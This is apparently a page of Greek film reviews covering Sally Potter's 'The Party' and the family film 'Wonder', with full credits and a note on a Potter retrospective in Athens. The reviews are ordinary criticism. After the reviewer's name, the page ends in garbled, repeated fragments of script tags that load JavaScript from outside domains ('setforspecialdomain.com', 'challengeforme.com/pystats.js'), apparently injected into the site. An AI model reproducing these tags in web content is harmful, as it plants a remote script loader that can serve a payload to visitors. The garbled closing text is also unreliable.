Πάμε κινηματογράφο;

The party

Σε μεγαλοαστικό λονδρέζικο διαμέρισμα, επτά φίλοι από την ανώτερη κοινωνική τάξη βιώνουν ένα δείπνο κωμικοτραγικών αποκαλύψεων, σε αυτή την στιλάτη και καλογραμμένη καυστική κωμωδία της γνωστής σκηνοθέτριας.

Το διεθνές σινεμά έχει συχνά σερβίρει αλησμόνητα φιλικά/ οικογενειακά δείπνα που εκτραχύνονται σε χαμό και κόλαση αποκαλύψεων. Πράγμα που κάνει εδώ και η Πότερ υπογράφοντας την μέχρι τούδε πιο εύχαρι ταινία της. Γυρισμένη σε σχεδόν αληθινό χρόνο –μόλις 71 λεπτά– και με την ασπρόμαυρη φωτογραφία του Ρώσου, Αλεξέι Ραντιόνοφ (με τον οποίον η Πότερ είχε συνεργαστεί στο εμβληματικό ντεμπούτο της «Ορλάντο» το 1992), το «Πάρτι» συγκεντρώνει επτά φίλους σε κομψό λονδρέζικο διαμέρισμα. Οικοδέσποινα, η Τζάνετ (Τόμας), πολιτικός καριέρας που έχει μόλις αναγορευτεί σκιώδης Υπουργός Υγείας της (μη κατονομαζόμενης) αντιπολίτευσης. Εξού, και το κάλεσμα των φίλων για να το γιορτάσουν. Στο πλευρό της Τζάνετ –κυρίως, όμως, στον κόσμο του–, ο εδώ και 30 χρόνια σύζυγος Μπιλ (Σπαλ), φιλόλογος με ακαδημαϊκή καριέρα. Μουσαφίρηδες, η Μάρθα (Τζόουνς), παλιά συνάδελφος του Μπιλ, λεσβία, και σύντομα μητέρα (στα 60 της…) χάρη στα τρίδυμα που κυοφορεί η νεαρή σύντροφός της, Τζίνι (Μόρτιμερ), η Έιπριλ (Κλάρκσον, με τις πιο βιτριολικά αστείες ατάκες), κολλητή της Τζάνετ, με τον καινούριο σύντροφό της, Γκόντφριντ (Γκαντς), έναν νεοεποχικό γκουρού αυτοβελτίωσης, και, τέλος, ο Τομ (Μέρφι) εκατομμυριούχος τραπεζίτης, που καταφθάνει με αρκετή κόκα κι ένα περίστροφο στην τσέπη του… Το εν λόγω όπλο το βλέπουμε στο εναρκτήριο πρωθύστερο πλάνο στα χέρια μιας κατασυγχισμένης Τζάνετ. Οπότε, ξέρουμε, κάτι πήγε πολύ στραβά στη διάρκεια της βραδιάς…

Γυρισμένη εν μέσω δημοψηφίσματος για το Μπρέξιτ, η ταινία –μέσα από απολαυστικούς διαλόγους που υπηρετεί θαυμάσια το λαμπρό καστ– σχολιάζει διάφορα θέματα που απασχολούν τη σημερινή Βρετανία, και όχι μόνο: νεοφεμινισμός, διαδικτυακό τρολάρισμα, πολιτικά αδιέξοδα, ή το Εργατικό Κόμμα, και το πασίγνωστο Εθνικό Σύστημα Υγείας του Ηνωμένου Βασιλείου δίνουν αφορμές για ατάκες που βγάζουν γέλιο στην κόψη του ξυραφιού. Αλλά η Πότερ τα προσεγγίζει όλα αυτά ακροθιγώς. Γιατί εκείνο που την ενδιαφέρει είναι η φαρσική κορύφωση της αντιπαράθεσης μεταξύ των χαρακτήρων. Μυστικά –για θανατηφόρες ασθένειες, εξωσυζυγικές σχέσεις και χρόνιες αντιπάθειες– έρχονται στο φως, το τραγικό πάει αλά μπρατσέτα με το κωμικό –και στο τέλος, βγαίνει και το προρηθέν όπλο… Ωραίο αγγλικό σινεμά.

· Στο πλαίσιο του αφιερώματος της Ταινιοθήκης της Ελλάδος στο έργο της Σάλι Πότερ (4-10 Ιανουαρίου), η βρετανίδα σκηνοθέτρια θα βρίσκεται στην Αθήνα στις 4/ 1 για να προλογίσει την προβολή του «The Party» και να συνομιλήσει με το κοινό. Πληροφορίες στα 210-3609695, 210-3612046.

Σκηνοθεσία
Σάλι Πότερ
Σενάριο
Σάλι Πότερ
Πρωταγωνιστούν
Τίμοθι Σπαλ, Κριστίν Σκοτ Τόμας, Μπρούνο Γκαντς, Πατρίσα Κλάρκσον, Σίλιαν Μέρφι, Τσέρι Τζόουνς, Έμιλι Μόρτιμερ
Διάρκεια
71
Χώρα
Ηνωμένο Βασίλειο
Είδος
Καυστική κωμωδία Α/Μ
Πρεμιέρα
28 Δεκεμβρίου 2017

 

Θαύμα
Wonder

WONDER INTERSTITIAL

Ένα εκ γενετής δύσμορφο αγόρι πηγαίνει για πρώτη φορά σχολείο στα 10 του, πυροδοτώντας αντιδράσεις στην οικογένεια και στην τάξη, σε αυτή την συμπαθητική και σίγουρα καλοπαιγμένη ταινία για παιδιά.

Η ταινία, που βασίζεται στο νεανικό ευπώλητο μυθιστόρημα του Αρ Τζέι Παλάσιο, διαρθρώνεται σε τέσσερα αλληλένδετα κεφάλαια που τιτλοφορούνται με το όνομα ενός από τους ανήλικους ήρωες της ιστορίας. Πρώτος και καλύτερος, ο Όγκι Πούλμαν (Τρέμπλεϊ, εξαιρετικός και πάλι ο μικρός-αποκάλυψη του «Δωματίου»), ένας δεκάχρονος που γεννήθηκε με σοβαρή κρανιοπροσωπική βλάβη (πολύ καλή η «μεταμόρφωση» του νεαρού ηθοποιού μέσω προσθετικής, μακιγιάζ και ελάχιστης ψηφιακής επεξεργασίας), και που μετά από 27 εγχειρίσεις (τα νοσοκομειακά βραχιολάκια στον τοίχο του δωματίου του τις θυμίζουν εύγλωττα) έχει το δύσμορφο πρόσωπο με το οποίο τον πρωτογνωρίζουμε. Με την απερίγραπτη στήριξη της δοτικής μάνας του (Ρόμπερτς, πολύ καλή), που παράτησε το διδακτορικό της για να προσφέρει στον Όγκι κατ’ οίκον εκπαίδευση, και με την πιο ανάλαφρη, μα εξίσου αγαπησιάρικη, συμβολή του πατέρα (Ουίλσον), ο πανέξυπνος Όγκι ετοιμάζεται να πάει για πρώτη φορά σχολείοˑ να εκτεθεί στις αντιδράσεις των ξένων, και να βγάλει πια το διαστημικό κράνος-παιχνίδι που φοράει εκτός σπιτιού… Το επόμενο κεφάλαιο σχετίζεται με την Βία (Βίντοβιτς), την μεγάλη αδελφή του Όγκι, που στα 15 της μοιάζει να έχει αποδεχτεί τον μοιραία δευτεραγωνιστικό ρόλο της μέσα στην οικογένεια –ή μήπως όχι; Ένα φλερτ με νεοφερμένο συμμαθητή \ (Νάτζι Τζέτερ) στο πλαίσιο της θεατρικής ομάδας του σχολείου θα βοηθήσει την Βία να ισορροπήσει, παρά την πρόσκαιρη απομάκρυνσή της από την κολλητή της, την Μιράντα (Ράσελ), της οποίας η ιστορία συνιστά το τρίτο κεφάλαιο της ταινίας.

Το τέταρτο κεφάλαιο-πορτρέτο αυτής της συμπαθητικής ταινίας (η οποία, παρεμπιπτόντως, αλλάζει το φύλο του φρικιού-πρωταγωνιστή, που στο βιβλίο είναι κορίτσι) τιτλοφορείται «Τζακ» και αφορά τον συμμαθητή κι εκκολαπτόμενο φίλο (Τζουπ, εξαιρετικός ο πιτσιρικάς του «Suburbicon») του Όγκι. Μέσα από τη σχέση του μικρού δύσμορφου «θαύματος» και του Τζακ αναδύεται το ζουμί της ταινίας (βοηθάει και η παρουσία του αναπόφευκτου συμμαθητή-εκφοβιστή, που υποδύεται ο Γκρέισαρ). Που δεν είναι άλλο από την αποδοχή της διαφορετικότητας, την συμπόνοια και την θετική πλευρά ακόμη και των πιο δύσκολων καταστάσεων. Ήγουν, θέματα που εμπνέουν (ελπίζω) παιδιά στην ηλικία του Όγκι, στα οποία απευθύνεται το «Θαύμα».

Σκηνοθεσία
Στίβεν Σουμπόσκι
Σενάριο
Στίβεν Σουμπόσκι, Στιβ Κόνραντ, Τζακ Θορν
Πρωταγωνιστούν
Τζέικομπ Τρέμπλεϊ, Τζούλια Ρόμπερτς, Όουεν Ουίλσον, Ιζαμπέλα Βίντοβιτς, Μάντι Πατίνκιν, Νόα Τζουπ, Μπράις Γκέισαρ, Ντανιέλα Ρόουζ Ράσελ, Ελ ΜακΚίνον
Διάρκεια
113
Χώρα
Ηνωμένες Πολιτείες, Χονγκ Κονγκ
Είδος
Οικογενειακό δράμα
Πρεμιέρα
28 Δεκεμβρίου 2017

 

 

Τατιάνα Καποδίστρια___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >